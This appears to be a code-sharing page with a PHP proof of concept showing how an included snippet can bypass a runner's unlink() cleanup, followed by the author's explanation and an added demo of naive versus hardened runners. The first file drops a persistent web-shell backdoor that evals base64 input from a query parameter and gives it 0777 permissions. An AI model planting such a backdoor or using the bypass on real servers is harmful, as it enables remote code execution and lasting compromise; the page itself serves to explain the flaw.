
Example of Malicious Code

malicious.php
<?php
// Proof of concept: what an attacker-controlled snippet can do when a runner
// writes it to a file, include()s it, and only unlink()s the file afterwards.
try {
    // Backdoor to persist: evaluates whatever base64-encoded PHP arrives in ?exec=
    $script = <<<'PHP'
<?php
// harmful code
if (!empty($_GET['exec'])) {
    eval(base64_decode($_GET['exec']));
}
PHP;

    // Save the backdoor next to the running script, world-accessible
    file_put_contents('./winning.php', $script);
    @chmod('./winning.php', 0777);

    // Run the dropped file in the background (it does nothing useful; this only
    // shows that the payload can spawn processes before any cleanup happens)
    exec("php ./winning.php > /dev/null 2>&1 &");
} catch (Exception $e) {
    // Swallow anything catchable so the drop above always completes
}

// Trigger a fatal error (undefined class) once the file is on disk: the host
// script aborts here, so its unlink() of the temp file never runs
$winning = new DuhWinning();

Can you please explain your code?

The code above is in response to a blog post entitled "How to use eval() without using eval() in PHP" by Gonzalo Ayuso. I was merely pointing out security flaws in the non-eval implementation (not that eval is secure) that would allow an attacker to bypass his unlink() call for removing the file, thereby making it persistent. I added some logic to make it run in the background for shits and giggles. It's merely a proof of concept, so it doesn't actually have any real functionality or purpose.

You can read Gonzalo's blog post at http://gonzalo123.wordpress.com/2012/03/12/how-to-use-eval-without-using-eval-in-php/
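The unlink() bypass the reply describes, as an added example that is neither the gist's code nor Gonzalo's own implementation. runSnippetNaive() is an assumed reconstruction of the write-include-unlink pattern, runSnippetWithCleanup() is a hardened variant, and the payload is constructed for this demo in the spirit of the gist. It assumes PHP 7 or later, where "new DuhWinning()" on an undefined class raises a catchable Error; on PHP 5 the same line is an uncatchable fatal error, so the naive run would take the whole script down, which is exactly the gist's point.

```php
<?php
declare(strict_types=1);

// Assumed shape of the "eval() without eval()" runner (a reconstruction for this
// example, not the blog post's code): write the snippet to a temp file, include
// it, unlink it. A fatal error inside the snippet unwinds past unlink().
function runSnippetNaive(string $code): void
{
    $tmp = tempnam(sys_get_temp_dir(), 'snippet_');
    file_put_contents($tmp, "<?php\n" . $code);
    include $tmp;   // an uncaught Error here skips the next line
    unlink($tmp);   // never reached when the snippet dies
}

// Hardened cleanup: finally (PHP 5.5+) handles catchable Errors (PHP 7+), and the
// shutdown handler covers PHP 5, where a fatal error is not catchable but
// register_shutdown_function() callbacks still run.
function runSnippetWithCleanup(string $code): void
{
    $tmp = tempnam(sys_get_temp_dir(), 'snippet_');
    $cleanup = static function () use ($tmp): void {
        if (is_file($tmp)) {
            unlink($tmp);
        }
    };
    register_shutdown_function($cleanup);
    file_put_contents($tmp, "<?php\n" . $code);
    try {
        include $tmp;
    } finally {
        $cleanup();
    }
}

// Constructed payload, in the spirit of the gist: drop a persistent file, then
// raise a fatal error so the caller's unlink() is skipped. $dropped is the
// path of the file to persist (an example value, chosen by the caller).
function payload(string $dropped): string
{
    return 'file_put_contents(' . var_export($dropped, true) . ', "<?php echo \'still here\';");' . "\n"
         . '$winning = new DuhWinning();' . "\n";   // undefined class: fatal error / Error
}

function leftoverTempFiles(): int
{
    return count(glob(sys_get_temp_dir() . '/snippet_*') ?: []);
}

// Runs one snippet runner against the payload and reports two facts:
// how many temp files it leaked, and whether the dropped file survived.
function demo(callable $runner): array
{
    $dropped = sys_get_temp_dir() . '/winning.php';
    @unlink($dropped);
    $before = leftoverTempFiles();
    try {
        $runner(payload($dropped));
    } catch (Error $e) {
        // PHP 7+: "Class 'DuhWinning' not found" arrives here as a catchable Error
    }
    $result = [
        'temp_files_leaked' => leftoverTempFiles() - $before,
        'dropped_file_persists' => is_file($dropped),
    ];
    @unlink($dropped);
    return $result;
}

foreach (['runSnippetNaive', 'runSnippetWithCleanup'] as $runner) {
    printf("%-22s temp files leaked: %d, dropped file persists: %s\n",
        $runner, demo($runner)['temp_files_leaked'],
        demo($runner)['dropped_file_persists'] ? 'yes' : 'no');
}
```

The naive runner leaks its temp file because the payload's fatal error fires before unlink(); the hardened runner removes it in either PHP generation. Both, however, leave the dropped winning.php on disk: cleanup that runs after untrusted code has executed cannot undo what that code already did, so the bypass the gist demonstrates is only closed by not executing attacker-controlled PHP at all, whether through eval() or through an included file.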
